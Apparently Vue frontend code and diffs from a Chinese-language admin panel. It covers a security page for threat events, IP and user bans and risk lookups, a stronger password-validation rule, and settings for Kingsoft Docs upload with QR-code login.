dashboardLoading.value = false
}
}
async function loadThreats() {
threatsLoading.value = true
try {
const params = {
page: threatPage.value,
per_page: pageSize,
}
if (threatTypeFilter.value) params.event_type = threatTypeFilter.value
if (threatSeverityFilter.value) params.severity = threatSeverityFilter.value
const data = await getThreats(params)
threatItems.value = data?.items || []
threatTotal.value = data?.total || 0
} catch {
threatItems.value = []
threatTotal.value = 0
} finally {
threatsLoading.value = false
}
}
async function loadBans() {
if (bansLoading.value) return
bansLoading.value = true
try {
const [ipsRes, usersRes] = await Promise.allSettled([getBannedIps(), getBannedUsers()])
bannedIps.value = ipsRes.status === 'fulfilled' ? ipsRes.value?.items || [] : []
bannedUsers.value = usersRes.status === 'fulfilled' ? usersRes.value?.items || [] : []
} finally {
bansLoading.value = false
}
}
async function refreshAll() {
await Promise.allSettled([loadDashboard(), loadThreats(), loadBans()])
}
function onThreatFilter() {
threatPage.value = 1
loadThreats()
}
function onThreatReset() {
threatTypeFilter.value = ''
threatSeverityFilter.value = ''
threatPage.value = 1
loadThreats()
}
function resetBanForm() {
banForm.value = {
kind: 'ip',
ip: '',
user_id: '',
reason: '',
duration_hours: 24,
permanent: false,
}
}
function openBanDialog(kind = 'ip', preset = {}) {
resetBanForm()
banForm.value.kind = kind === 'user' ? 'user' : 'ip'
if (banForm.value.kind === 'ip') {
banForm.value.ip = String(preset.ip || '').trim()
} else {
banForm.value.user_id = String(preset.user_id || '').trim()
}
if (preset.reason) banForm.value.reason = String(preset.reason || '').trim()
banDialogOpen.value = true
}
async function submitBan() {
const kind = banForm.value.kind
const reason = String(banForm.value.reason || '').trim()
const permanent = Boolean(banForm.value.permanent)
const durationHours = Number(banForm.value.duration_hours || 24)
if (!reason) {
ElMessage.error('原因不能为空')
return
}
if (kind === 'ip') {
const ip = String(banForm.value.ip || '').trim()
if (!ip) {
ElMessage.error('IP不能为空')
return
}
banSubmitting.value = true
try {
await banIp({ ip, reason, duration_hours: durationHours, permanent })
ElMessage.success('IP已封禁')
banDialogOpen.value = false
await Promise.allSettled([loadDashboard(), loadBans()])
} catch {
// handled by interceptor
} finally {
banSubmitting.value = false
}
return
}
const userIdRaw = String(banForm.value.user_id || '').trim()
const userId = Number.parseInt(userIdRaw, 10)
if (!Number.isFinite(userId)) {
ElMessage.error('用户ID无效')
return
}
banSubmitting.value = true
try {
await banUser({ user_id: userId, reason, duration_hours: durationHours, permanent })
ElMessage.success('用户已封禁')
banDialogOpen.value = false
await Promise.allSettled([loadDashboard(), loadBans()])
} catch {
// handled by interceptor
} finally {
banSubmitting.value = false
}
}
async function onUnbanIp(ip) {
const ipText = String(ip || '').trim()
if (!ipText) return
try {
await ElMessageBox.confirm(`确定解除对 IP ${ipText} 的封禁吗?`, '解除封禁', {
confirmButtonText: '解除',
cancelButtonText: '取消',
type: 'warning',
})
} catch {
return
}
try {
await unbanIp(ipText)
ElMessage.success('已解除IP封禁')
await Promise.allSettled([loadDashboard(), loadBans()])
} catch {
// handled by interceptor
}
}
async function onUnbanUser(userId) {
const id = Number.parseInt(String(userId || '').trim(), 10)
if (!Number.isFinite(id)) return
try {
await ElMessageBox.confirm(`确定解除对 用户ID ${id} 的封禁吗?`, '解除封禁', {
confirmButtonText: '解除',
cancelButtonText: '取消',
type: 'warning',
})
} catch {
return
}
try {
await unbanUser(id)
ElMessage.success('已解除用户封禁')
await Promise.allSettled([loadDashboard(), loadBans()])
} catch {
// handled by interceptor
}
}
function jumpToIpRisk(ip) {
const ipText = String(ip || '').trim()
if (!ipText) return
activeTab.value = 'risk'
riskTab.value = 'ip'
riskIpInput.value = ipText
queryIpRisk()
}
function jumpToUserRisk(userId) {
const idText = String(userId || '').trim()
if (!idText) return
activeTab.value = 'risk'
riskTab.value = 'user'
riskUserIdInput.value = idText
queryUserRisk()
}
async function queryIpRisk() {
const ip = String(riskIpInput.value || '').trim()
if (!ip) {
ElMessage.error('请输入IP')
return
}
riskLoading.value = true
try {
riskResult.value = await getIpRisk(ip)
riskResultKind.value = 'ip'
} catch {
riskResult.value = null
riskResultKind.value = ''
} finally {
riskLoading.value = false
}
}
async function queryUserRisk() {
const raw = String(riskUserIdInput.value || '').trim()
const userId = Number.parseInt(raw, 10)
if (!Number.isFinite(userId)) {
ElMessage.error('请输入有效的用户ID')
return
}
riskLoading.value = true
try {
riskResult.value = await getUserRisk(userId)
riskResultKind.value = 'user'
} catch {
riskResult.value = null
riskResultKind.value = ''
} finally {
riskLoading.value = false
}
}
function openBanFromRisk() {
if (!riskResult.value || !riskResultKind.value) return
if (riskResultKind.value === 'ip') {
openBanDialog('ip', { ip: riskResult.value?.ip, reason: '风险查询手动封禁' })
} else {
openBanDialog('user', { user_id: riskResult.value?.user_id, reason: '风险查询手动封禁' })
}
}
async function unbanFromRisk() {
if (!riskResult.value || !riskResultKind.value) return
if (riskResultKind.value === 'ip') {
await onUnbanIp(riskResult.value?.ip)
await queryIpRisk()
} else {
await onUnbanUser(riskResult.value?.user_id)
await queryUserRisk()
}
}
async function clearIpRiskScore() {
if (riskResultKind.value !== 'ip') return
const ipText = String(riskResult.value?.ip || '').trim()
if (!ipText) return
try {
await ElMessageBox.confirm(
`确定清除 IP ${ipText} 的风险分吗?\n\n清除风险分不会删除威胁历史也不会解除封禁。`,
'清除风险分',
{ confirmButtonText: '清除', cancelButtonText: '取消', type: 'warning' },
)
} catch {
return
}
if (riskLoading.value) return
riskLoading.value = true
try {
await clearIpRisk(ipText)
ElMessage.success('IP风险分已清零')
} catch {
// handled by interceptor
} finally {
riskLoading.value = false
}
await queryIpRisk()
}
const cleanupLoading = ref(false)
async function onCleanup() {
try {
await ElMessageBox.confirm(
'确定清理过期封禁记录,并衰减风险分吗?\n\n该操作不会影响仍在有效期内的封禁。',
'清理过期记录',
{ confirmButtonText: '清理', cancelButtonText: '取消', type: 'warning' },
)
} catch {
return
}
cleanupLoading.value = true
try {
await cleanup()
ElMessage.success('清理完成')
await refreshAll()
} catch {
// handled by interceptor
} finally {
cleanupLoading.value = false
}
}
onMounted(async () => {
await refreshAll()
})
</script>
<template>
<div class="page-stack">
<div class="app-page-title">
<h2>安全防护</h2>
<div class="toolbar">
<el-button @click="refreshAll">刷新</el-button>
<el-button type="warning" plain :loading="cleanupLoading" @click="onCleanup">清理过期记录</el-button>
<el-button type="primary" @click="openBanDialog()">手动封禁</el-button>
</div>
</div>
<el-row :gutter="12" class="stats-row">
<el-col v-for="it in dashboardCards" :key="it.key" :xs="24" :sm="8" :md="8" :lg="8" :xl="8">
<el-card shadow="never" class="stat-card" :body-style="{ padding: '14px' }">
<div class="stat-value">
<el-skeleton v-if="dashboardLoading" :rows="1" animated />
<template v-else>{{ it.value }}</template>
</div>
<div class="stat-label">{{ it.label }}</div>
</el-card>
</el-col>
</el-row>
<el-card shadow="never" :body-style="{ padding: '16px' }" class="card">
<el-tabs v-model="activeTab">
<el-tab-pane label="威胁事件" name="threats">
<div class="filters">
<el-select
v-model="threatTypeFilter"
placeholder="类型"
style="width: 220px"
filterable
clearable
allow-create
default-first-option
>
<el-option label="全部" value="" />
<el-option v-for="t in threatTypeOptions" :key="t.value" :label="t.label" :value="t.value" />
</el-select>
<el-select v-model="threatSeverityFilter" placeholder="严重程度" style="width: 200px" clearable>
<el-option label="全部" value="" />
<el-option label="高风险(>=80)" value="high" />
<el-option label="中风险(50-79)" value="medium" />
<el-option label="低风险(<50)" value="low" />
</el-select>
<el-button type="primary" @click="onThreatFilter">筛选</el-button>
<el-button @click="onThreatReset">重置</el-button>
</div>
<div class="table-wrap">
<el-table :data="threatItems" v-loading="threatsLoading" style="width: 100%">
<el-table-column prop="created_at" label="时间" width="180" />
<el-table-column label="类型" width="170">
<template #default="{ row }">
<el-tag effect="light" type="info">{{ row.threat_type || 'unknown' }}</el-tag>
</template>
</el-table-column>
<el-table-column label="严重程度" width="120">
<template #default="{ row }">
<el-tag :type="scoreMeta(row.score).type" effect="light">
{{ scoreMeta(row.score).label }} ({{ row.score ?? 0 }})
</el-tag>
</template>
</el-table-column>
<el-table-column label="IP" width="150">
<template #default="{ row }">
<el-link v-if="row.ip" type="primary" :underline="false" @click="jumpToIpRisk(row.ip)">
{{ row.ip }}
</el-link>
<span v-else>-</span>
</template>
</el-table-column>
<el-table-column label="用户" width="120">
<template #default="{ row }">
<el-link
v-if="row.user_id !== null && row.user_id !== undefined"
type="primary"
:underline="false"
@click="jumpToUserRisk(row.user_id)"
>
{{ row.user_id }}
</el-link>
<span v-else>-</span>
</template>
</el-table-column>
<el-table-column label="操作路径" min-width="220">
<template #default="{ row }">
<el-tooltip :content="pathText(row)" placement="top" :show-after="300">
<span class="mono ellipsis">{{ pathText(row) }}</span>
</el-tooltip>
</template>
</el-table-column>
<el-table-column label="Payload预览" min-width="240">
<template #default="{ row }">
<el-tooltip :content="payloadTooltip(row)" placement="top" :show-after="300">
<span class="ellipsis">{{ row.value_preview || '-' }}</span>
</el-tooltip>
</template>
</el-table-column>
</el-table>
</div>
<div class="pagination">
<el-pagination
v-model:current-page="threatPage"
:page-size="pageSize"
:total="threatTotal"
layout="prev, pager, next, jumper, ->, total"
@current-change="loadThreats"
/>
<div class="page-hint app-muted"> {{ threatPage }} / {{ threatTotalPages }} </div>
</div>
</el-tab-pane>
<el-tab-pane label="封禁管理" name="bans">
<div class="toolbar">
<el-button @click="loadBans">刷新封禁列表</el-button>
<el-button type="primary" @click="openBanDialog()">手动封禁</el-button>
</div>
<el-tabs v-model="banTab" class="inner-tabs">
<el-tab-pane label="IP黑名单" name="ips">
<div class="table-wrap">
<el-table :data="bannedIps" v-loading="bansLoading" style="width: 100%">
<el-table-column label="IP" width="180">
<template #default="{ row }">
<el-link type="primary" :underline="false" @click="jumpToIpRisk(row.ip)">
{{ row.ip || '-' }}
</el-link>
</template>
</el-table-column>
<el-table-column prop="reason" label="原因" min-width="260" />
<el-table-column label="过期时间" width="190">
<template #default="{ row }">{{ formatExpires(row.expires_at) }}</template>
</el-table-column>
<el-table-column label="操作" width="120" fixed="right">
<template #default="{ row }">
<el-button size="small" type="danger" plain @click="onUnbanIp(row.ip)">解除</el-button>
</template>
</el-table-column>
</el-table>
</div>
</el-tab-pane>
<el-tab-pane label="用户黑名单" name="users">
<div class="table-wrap">
<el-table :data="bannedUsers" v-loading="bansLoading" style="width: 100%">
<el-table-column label="用户ID" width="180">
<template #default="{ row }">
<el-link type="primary" :underline="false" @click="jumpToUserRisk(row.user_id)">
{{ row.user_id ?? '-' }}
</el-link>
</template>
</el-table-column>
<el-table-column prop="reason" label="原因" min-width="260" />
<el-table-column label="过期时间" width="190">
<template #default="{ row }">{{ formatExpires(row.expires_at) }}</template>
</el-table-column>
<el-table-column label="操作" width="120" fixed="right">
<template #default="{ row }">
<el-button size="small" type="danger" plain @click="onUnbanUser(row.user_id)">解除</el-button>
</template>
</el-table-column>
</el-table>
</div>
</el-tab-pane>
</el-tabs>
</el-tab-pane>
<el-tab-pane label="风险查询" name="risk">
<el-tabs v-model="riskTab" class="inner-tabs">
<el-tab-pane label="IP查询" name="ip">
<div class="filters">
<el-input v-model="riskIpInput" placeholder="输入IP如 1.2.3.4" style="width: 260px" clearable />
<el-button type="primary" :loading="riskLoading" @click="queryIpRisk">查询</el-button>
</div>
</el-tab-pane>
<el-tab-pane label="用户查询" name="user">
<div class="filters">
<el-input v-model="riskUserIdInput" placeholder="输入用户ID如 123" style="width: 260px" clearable />
<el-button type="primary" :loading="riskLoading" @click="queryUserRisk">查询</el-button>
</div>
</el-tab-pane>
</el-tabs>
<el-card v-if="riskResult" shadow="never" :body-style="{ padding: '16px' }" class="sub-card">
<div class="risk-head">
<div class="risk-title">
<strong v-if="riskResultKind === 'ip'">IP: {{ riskResult.ip }}</strong>
<strong v-else>用户ID: {{ riskResult.user_id }}</strong>
<span class="app-muted">风险分</span>
<el-tag :type="scoreMeta(riskResult.risk_score).type" effect="light">
{{ riskResult.risk_score ?? 0 }}
</el-tag>
<el-tag v-if="riskResult.is_banned" type="danger" effect="light">已封禁</el-tag>
<el-tag v-else type="success" effect="light">未封禁</el-tag>
</div>
<div class="toolbar">
<el-button v-if="!riskResult.is_banned" type="primary" plain @click="openBanFromRisk">封禁</el-button>
<el-button v-else type="danger" plain @click="unbanFromRisk">解除封禁</el-button>
<el-button
v-if="riskResultKind === 'ip'"
type="warning"
plain
:loading="riskLoading"
@click="clearIpRiskScore"
>
清除风险分
</el-button>
</div>
</div>
<div class="table-wrap">
<el-table :data="riskResult.threat_history || []" v-loading="riskLoading" style="width: 100%">
<el-table-column prop="created_at" label="时间" width="180" />
<el-table-column label="类型" width="170">
<template #default="{ row }">
<el-tag effect="light" type="info">{{ row.threat_type || 'unknown' }}</el-tag>
</template>
</el-table-column>
<el-table-column label="严重程度" width="120">
<template #default="{ row }">
<el-tag :type="scoreMeta(row.score).type" effect="light">
{{ scoreMeta(row.score).label }} ({{ row.score ?? 0 }})
</el-tag>
</template>
</el-table-column>
<el-table-column label="操作路径" min-width="220">
<template #default="{ row }">
<el-tooltip :content="pathText(row)" placement="top" :show-after="300">
<span class="mono ellipsis">{{ pathText(row) }}</span>
</el-tooltip>
</template>
</el-table-column>
<el-table-column label="Payload预览" min-width="240">
<template #default="{ row }">
<el-tooltip :content="payloadTooltip(row)" placement="top" :show-after="300">
<span class="ellipsis">{{ row.value_preview || '-' }}</span>
</el-tooltip>
</template>
</el-table-column>
</el-table>
</div>
</el-card>
</el-tab-pane>
</el-tabs>
</el-card>
<el-dialog v-model="banDialogOpen" title="手动封禁" width="min(520px, 92vw)" @closed="resetBanForm">
<el-form label-width="120px">
<el-form-item label="类型">
<el-radio-group v-model="banForm.kind">
<el-radio-button label="ip">IP</el-radio-button>
<el-radio-button label="user">用户</el-radio-button>
</el-radio-group>
</el-form-item>
<el-form-item v-if="banForm.kind === 'ip'" label="IP">
<el-input v-model="banForm.ip" placeholder="例如 1.2.3.4" />
</el-form-item>
<el-form-item v-else label="用户ID">
<el-input v-model="banForm.user_id" placeholder="例如 123" />
</el-form-item>
<el-form-item label="原因">
<el-input v-model="banForm.reason" type="textarea" :rows="3" placeholder="请输入封禁原因" />
</el-form-item>
<el-form-item label="永久封禁">
<el-switch v-model="banForm.permanent" />
</el-form-item>
<el-form-item v-if="!banForm.permanent" label="持续(小时)">
<el-input-number v-model="banForm.duration_hours" :min="1" :max="8760" />
</el-form-item>
</el-form>
<template #footer>
<div class="dialog-actions">
<div class="spacer"></div>
<el-button @click="banDialogOpen = false">取消</el-button>
<el-button type="primary" :loading="banSubmitting" @click="submitBan">确认封禁</el-button>
</div>
</template>
</el-dialog>
</div>
</template>
<style scoped>
.page-stack {
display: flex;
flex-direction: column;
gap: 12px;
}
.toolbar {
display: flex;
gap: 10px;
align-items: center;
flex-wrap: wrap;
}
.stats-row {
margin-bottom: 2px;
}
.card {
border-radius: var(--app-radius);
border: 1px solid var(--app-border);
}
.sub-card {
margin-top: 12px;
border-radius: var(--app-radius);
border: 1px solid var(--app-border);
}
.stat-card {
border-radius: var(--app-radius);
border: 1px solid var(--app-border);
box-shadow: var(--app-shadow);
}
.stat-value {
font-size: 22px;
font-weight: 800;
line-height: 1.1;
}
.stat-label {
margin-top: 6px;
font-size: 12px;
color: var(--app-muted);
}
.filters {
display: flex;
flex-wrap: wrap;
gap: 10px;
align-items: center;
margin-bottom: 12px;
}
.table-wrap {
overflow-x: auto;
}
.ellipsis {
display: inline-block;
max-width: 100%;
overflow: hidden;
text-overflow: ellipsis;
white-space: nowrap;
}
.mono {
font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, 'Liberation Mono', 'Courier New', monospace;
}
.pagination {
display: flex;
align-items: center;
justify-content: space-between;
gap: 10px;
margin-top: 14px;
flex-wrap: wrap;
}
.page-hint {
font-size: 12px;
}
.inner-tabs {
margin-top: 6px;
}
.risk-head {
display: flex;
align-items: flex-start;
justify-content: space-between;
gap: 12px;
margin-bottom: 12px;
flex-wrap: wrap;
}
.risk-title {
display: flex;
align-items: center;
gap: 10px;
flex-wrap: wrap;
}
.dialog-actions {
display: flex;
align-items: center;
gap: 10px;
}
.spacer {
flex: 1;
}
</style>

View File

@@ -8,6 +8,14 @@ const username = ref('')
const password = ref('')
const submitting = ref(false)
function validateStrongPassword(value) {
const text = String(value || '')
if (text.length < 8) return { ok: false, message: '密码长度至少8位' }
if (text.length > 128) return { ok: false, message: '密码长度不能超过128个字符' }
if (!/[a-zA-Z]/.test(text) || !/\d/.test(text)) return { ok: false, message: '密码必须包含字母和数字' }
return { ok: true, message: '' }
}
async function relogin() {
try {
await logout()
@@ -54,8 +62,9 @@ async function savePassword() {
ElMessage.error('请输入新密码')
return
}
if (value.length < 6) {
ElMessage.error('密码至少6个字符')
const check = validateStrongPassword(value)
if (!check.ok) {
ElMessage.error(check.message)
return
}

View File

@@ -1,10 +1,10 @@
<script setup>
import { computed, onBeforeUnmount, onMounted, ref } from 'vue'
import { computed, onBeforeUnmount, onMounted, ref, watch } from 'vue'
import { ElMessage, ElMessageBox } from 'element-plus'
import { fetchSystemConfig, updateSystemConfig, executeScheduleNow } from '../api/system'
import { fetchKdocsQr, fetchKdocsStatus, clearKdocsLogin } from '../api/kdocs'
import { fetchProxyConfig, testProxy, updateProxyConfig } from '../api/proxy'
import { fetchUpdateLog, fetchUpdateResult, fetchUpdateStatus, requestUpdateCheck, requestUpdateRun } from '../api/update'
const loading = ref(false)
@@ -18,6 +18,7 @@ const scheduleEnabled = ref(false)
const scheduleTime = ref('02:00')
const scheduleBrowseType = ref('应读')
const scheduleWeekdays = ref(['1', '2', '3', '4', '5', '6', '7'])
const scheduleScreenshotEnabled = ref(true)
// 代理
const proxyEnabled = ref(false)
@@ -29,16 +30,25 @@ const autoApproveEnabled = ref(false)
const autoApproveHourlyLimit = ref(10)
const autoApproveVipDays = ref(7)
// 自动更新
const updateLoading = ref(false)
const updateActionLoading = ref(false)
const updateStatus = ref(null)
const updateStatusError = ref('')
const updateResult = ref(null)
const updateLog = ref('')
const updateLogTruncated = ref(false)
const updateBuildNoCache = ref(false)
let updatePollTimer = null
// 金山文档上传
const kdocsEnabled = ref(false)
const kdocsDocUrl = ref('')
const kdocsDefaultUnit = ref('')
const kdocsSheetName = ref('')
const kdocsSheetIndex = ref(0)
const kdocsUnitColumn = ref('A')
const kdocsImageColumn = ref('D')
const kdocsAdminNotifyEnabled = ref(false)
const kdocsAdminNotifyEmail = ref('')
const kdocsStatus = ref({})
const kdocsQrOpen = ref(false)
const kdocsQrImage = ref('')
const kdocsPolling = ref(false)
const kdocsStatusLoading = ref(false)
const kdocsQrLoading = ref(false)
const kdocsClearLoading = ref(false)
const kdocsActionHint = ref('')
let kdocsPollingTimer = null
const weekdaysOptions = [
{ label: '周一', value: '1' },
@@ -65,69 +75,32 @@ const scheduleWeekdayDisplay = computed(() =>
.map((d) => weekdayNames[Number(d)] || d)
.join('、'),
)
const kdocsActionBusy = computed(
() => kdocsStatusLoading.value || kdocsQrLoading.value || kdocsClearLoading.value,
)
function normalizeBrowseType(value) {
if (String(value) === '注册前未读') return '注册前未读'
return '应读'
}
function shortCommit(value) {
const text = String(value || '').trim()
if (!text) return '-'
return text.length > 12 ? `${text.slice(0, 12)}` : text
}
async function loadUpdateInfo({ withLog = true } = {}) {
updateLoading.value = true
updateStatusError.value = ''
try {
const [statusRes, resultRes] = await Promise.all([fetchUpdateStatus(), fetchUpdateResult()])
if (statusRes?.ok) {
updateStatus.value = statusRes.data || null
} else {
updateStatus.value = null
updateStatusError.value = statusRes?.error || '未发现更新状态Update-Agent 可能未运行)'
}
updateResult.value = resultRes?.ok ? resultRes.data : null
const jobId = updateResult.value?.job_id
if (withLog && jobId) {
const logRes = await fetchUpdateLog({ job_id: jobId, max_bytes: 200000 })
updateLog.value = logRes?.log || ''
updateLogTruncated.value = !!logRes?.truncated
} else {
updateLog.value = ''
updateLogTruncated.value = false
}
} catch {
// handled by interceptor
} finally {
updateLoading.value = false
}
}
function startUpdatePolling() {
if (updatePollTimer) return
updatePollTimer = setInterval(async () => {
if (updateResult.value?.status === 'running') {
await loadUpdateInfo()
}
}, 5000)
}
function stopUpdatePolling() {
if (updatePollTimer) {
clearInterval(updatePollTimer)
updatePollTimer = null
function setKdocsHint(message) {
if (!message) {
kdocsActionHint.value = ''
return
}
const time = new Date().toLocaleTimeString('zh-CN', { hour12: false })
kdocsActionHint.value = `${message} (${time})`
}
async function loadAll() {
loading.value = true
try {
const [system, proxy] = await Promise.all([fetchSystemConfig(), fetchProxyConfig()])
const [system, proxy, kdocsInfo] = await Promise.all([
fetchSystemConfig(),
fetchProxyConfig(),
fetchKdocsStatus().catch(() => ({})),
])
maxConcurrentGlobal.value = system.max_concurrent_global ?? 2
maxConcurrentPerAccount.value = system.max_concurrent_per_account ?? 1
@@ -142,6 +115,7 @@ async function loadAll() {
.map((x) => x.trim())
.filter(Boolean)
scheduleWeekdays.value = weekdays.length ? weekdays : ['1', '2', '3', '4', '5', '6', '7']
scheduleScreenshotEnabled.value = (system.enable_screenshot ?? 1) === 1
autoApproveEnabled.value = (system.auto_approve_enabled ?? 0) === 1
autoApproveHourlyLimit.value = system.auto_approve_hourly_limit ?? 10
@@ -151,8 +125,16 @@ async function loadAll() {
proxyApiUrl.value = proxy.proxy_api_url || ''
proxyExpireMinutes.value = proxy.proxy_expire_minutes ?? 3
await loadUpdateInfo({ withLog: false })
startUpdatePolling()
kdocsEnabled.value = (system.kdocs_enabled ?? 0) === 1
kdocsDocUrl.value = system.kdocs_doc_url || ''
kdocsDefaultUnit.value = system.kdocs_default_unit || ''
kdocsSheetName.value = system.kdocs_sheet_name || ''
kdocsSheetIndex.value = system.kdocs_sheet_index ?? 0
kdocsUnitColumn.value = (system.kdocs_unit_column || 'A').toUpperCase()
kdocsImageColumn.value = (system.kdocs_image_column || 'D').toUpperCase()
kdocsAdminNotifyEnabled.value = (system.kdocs_admin_notify_enabled ?? 0) === 1
kdocsAdminNotifyEmail.value = system.kdocs_admin_notify_email || ''
kdocsStatus.value = kdocsInfo || {}
} catch {
// handled by interceptor
} finally {
@@ -196,10 +178,12 @@ async function saveSchedule() {
schedule_time: scheduleTime.value,
schedule_browse_type: scheduleBrowseType.value,
schedule_weekdays: (scheduleWeekdays.value || []).join(','),
enable_screenshot: scheduleScreenshotEnabled.value ? 1 : 0,
}
const screenshotText = scheduleScreenshotEnabled.value ? '截图' : '不截图'
const message = scheduleEnabled.value
? `确定启用定时任务吗?\n\n执行时间: 每天 ${payload.schedule_time}\n执行日期: ${scheduleWeekdayDisplay.value}\n浏览类型: ${payload.schedule_browse_type}\n\n系统将自动执行所有账号的浏览任务(不包含截图)`
? `确定启用定时任务吗?\n\n执行时间: 每天 ${payload.schedule_time}\n执行日期: ${scheduleWeekdayDisplay.value}\n浏览类型: ${payload.schedule_browse_type}\n截图: ${screenshotText}\n\n系统将自动执行所有账号的浏览任务`
: '确定关闭定时任务吗?'
try {
@@ -260,6 +244,131 @@ async function saveProxy() {
}
}
async function saveKdocsConfig() {
const payload = {
kdocs_enabled: kdocsEnabled.value ? 1 : 0,
kdocs_doc_url: kdocsDocUrl.value.trim(),
kdocs_default_unit: kdocsDefaultUnit.value.trim(),
kdocs_sheet_name: kdocsSheetName.value.trim(),
kdocs_sheet_index: Number(kdocsSheetIndex.value) || 0,
kdocs_unit_column: kdocsUnitColumn.value.trim().toUpperCase(),
kdocs_image_column: kdocsImageColumn.value.trim().toUpperCase(),
kdocs_admin_notify_enabled: kdocsAdminNotifyEnabled.value ? 1 : 0,
kdocs_admin_notify_email: kdocsAdminNotifyEmail.value.trim(),
}
try {
const res = await updateSystemConfig(payload)
ElMessage.success(res?.message || '表格配置已更新')
} catch {
// handled by interceptor
}
}
async function refreshKdocsStatus() {
if (kdocsStatusLoading.value) return
kdocsStatusLoading.value = true
setKdocsHint('正在刷新状态')
try {
kdocsStatus.value = await fetchKdocsStatus({ live: 1 })
setKdocsHint('状态已刷新')
} catch {
setKdocsHint('刷新失败,请稍后重试')
} finally {
kdocsStatusLoading.value = false
}
}
async function pollKdocsStatus() {
try {
const status = await fetchKdocsStatus({ live: 1 })
kdocsStatus.value = status
const loggedIn = status?.logged_in === true || status?.last_login_ok === true
if (loggedIn) {
ElMessage.success('扫码成功,已登录')
setKdocsHint('扫码成功,已登录')
kdocsQrOpen.value = false
stopKdocsPolling()
}
} catch {
// handled by interceptor
}
}
function startKdocsPolling() {
stopKdocsPolling()
kdocsPolling.value = true
setKdocsHint('扫码检测中')
pollKdocsStatus()
kdocsPollingTimer = setInterval(pollKdocsStatus, 2000)
}
function stopKdocsPolling() {
if (kdocsPollingTimer) {
clearInterval(kdocsPollingTimer)
kdocsPollingTimer = null
}
kdocsPolling.value = false
}
async function onFetchKdocsQr() {
if (kdocsQrLoading.value) return
kdocsQrLoading.value = true
setKdocsHint('正在获取二维码')
try {
kdocsQrImage.value = ''
const res = await fetchKdocsQr()
kdocsQrImage.value = res?.qr_image || ''
if (!kdocsQrImage.value) {
if (res?.logged_in) {
ElMessage.success('当前已登录,无需扫码')
setKdocsHint('当前已登录,无需扫码')
await refreshKdocsStatus()
return
}
ElMessage.warning('未获取到二维码')
setKdocsHint('未获取到二维码')
return
}
setKdocsHint('二维码已获取')
kdocsQrOpen.value = true
} catch {
setKdocsHint('获取二维码失败')
} finally {
kdocsQrLoading.value = false
}
}
async function onClearKdocsLogin() {
if (kdocsClearLoading.value) return
kdocsClearLoading.value = true
setKdocsHint('正在清除登录态')
try {
await clearKdocsLogin()
kdocsQrOpen.value = false
kdocsQrImage.value = ''
ElMessage.success('登录态已清除')
setKdocsHint('登录态已清除')
await refreshKdocsStatus()
} catch {
setKdocsHint('清除登录态失败')
} finally {
kdocsClearLoading.value = false
}
}
watch(kdocsQrOpen, (open) => {
if (open) {
startKdocsPolling()
} else {
stopKdocsPolling()
}
})
onBeforeUnmount(() => {
stopKdocsPolling()
})
async function onTestProxy() {
if (!proxyApiUrl.value.trim()) {
ElMessage.error('请先输入代理API地址')
@@ -301,49 +410,7 @@ async function saveAutoApprove() {
}
}
async function onCheckUpdate() {
updateActionLoading.value = true
try {
const res = await requestUpdateCheck()
ElMessage.success(res?.success ? '已触发检查更新' : '已提交检查请求')
setTimeout(() => loadUpdateInfo({ withLog: false }), 800)
} catch {
// handled by interceptor
} finally {
updateActionLoading.value = false
}
}
async function onRunUpdate() {
const status = updateStatus.value
const remote = status?.remote_commit ? shortCommit(status.remote_commit) : '-'
const buildFlags = updateBuildNoCache.value ? '\n\n构建选项: 强制重建(--no-cache' : ''
try {
await ElMessageBox.confirm(
`确定开始“一键更新”吗?\n\n目标版本: ${remote}${buildFlags}\n\n更新将会重建并重启服务页面可能短暂不可用系统会先备份数据库。`,
'一键更新确认',
{ confirmButtonText: '开始更新', cancelButtonText: '取消', type: 'warning' },
)
} catch {
return
}
updateActionLoading.value = true
try {
const res = await requestUpdateRun({ build_no_cache: updateBuildNoCache.value ? 1 : 0 })
ElMessage.success(res?.message || '已提交更新请求')
startUpdatePolling()
setTimeout(() => loadUpdateInfo(), 800)
} catch {
// handled by interceptor
} finally {
updateActionLoading.value = false
}
}
onMounted(loadAll)
onBeforeUnmount(stopUpdatePolling)
</script>
<template>
@@ -371,7 +438,7 @@ onBeforeUnmount(stopUpdatePolling)
<el-form-item label="截图最大并发数">
<el-input-number v-model="maxScreenshotConcurrent" :min="1" :max="50" />
<div class="help">同时进行截图的最大数量每个浏览器约占用 200MB 内存</div>
<div class="help">同时进行截图的最大数量wkhtmltoimage 资源占用较低可按需提高</div>
</el-form-item>
</el-form>
@@ -384,6 +451,7 @@ onBeforeUnmount(stopUpdatePolling)
<el-form label-width="130px">
<el-form-item label="启用定时任务">
<el-switch v-model="scheduleEnabled" />
<div class="help">开启后系统会按计划自动执行浏览任务</div>
</el-form-item>
<el-form-item v-if="scheduleEnabled" label="执行时间">
@@ -404,6 +472,11 @@ onBeforeUnmount(stopUpdatePolling)
</el-checkbox>
</el-checkbox-group>
</el-form-item>
<el-form-item v-if="scheduleEnabled" label="定时任务截图">
<el-switch v-model="scheduleScreenshotEnabled" />
<div class="help">开启后定时任务执行时会生成截图</div>
</el-form-item>
</el-form>
<div class="row-actions">
@@ -458,88 +531,95 @@ onBeforeUnmount(stopUpdatePolling)
<el-button type="primary" @click="saveAutoApprove">保存注册设置</el-button>
</el-card>
<el-card shadow="never" :body-style="{ padding: '16px' }" class="card" v-loading="updateLoading">
<h3 class="section-title">版本与更新</h3>
<el-card shadow="never" :body-style="{ padding: '16px' }" class="card">
<h3 class="section-title">金山文档上传</h3>
<el-alert
v-if="updateStatus?.update_available"
type="warning"
:closable="false"
title="检测到新版本:可以在此页面点击“一键更新”升级并自动重启服务。"
style="margin-bottom: 10px"
/>
<el-form label-width="130px">
<el-form-item label="启用上传">
<el-switch v-model="kdocsEnabled" />
<div class="help">表格结构变化时可先关闭避免错误上传</div>
</el-form-item>
<el-alert
v-if="updateStatusError"
type="info"
:closable="false"
:title="updateStatusError"
style="margin-bottom: 10px"
/>
<el-form-item label="文档链接">
<el-input v-model="kdocsDocUrl" placeholder="https://kdocs.cn/..." />
</el-form-item>
<el-descriptions border :column="1" size="small" style="margin-bottom: 10px">
<el-descriptions-item label="本地版本(commit)">
{{ shortCommit(updateStatus?.local_commit) }}
</el-descriptions-item>
<el-descriptions-item label="远端版本(commit)">
{{ shortCommit(updateStatus?.remote_commit) }}
</el-descriptions-item>
<el-descriptions-item label="是否有更新">
<el-tag v-if="updateStatus?.update_available" type="danger"></el-tag>
<el-tag v-else type="success"></el-tag>
</el-descriptions-item>
<el-descriptions-item label="工作区修改">
<el-tag v-if="updateStatus?.dirty" type="warning">有未提交修改</el-tag>
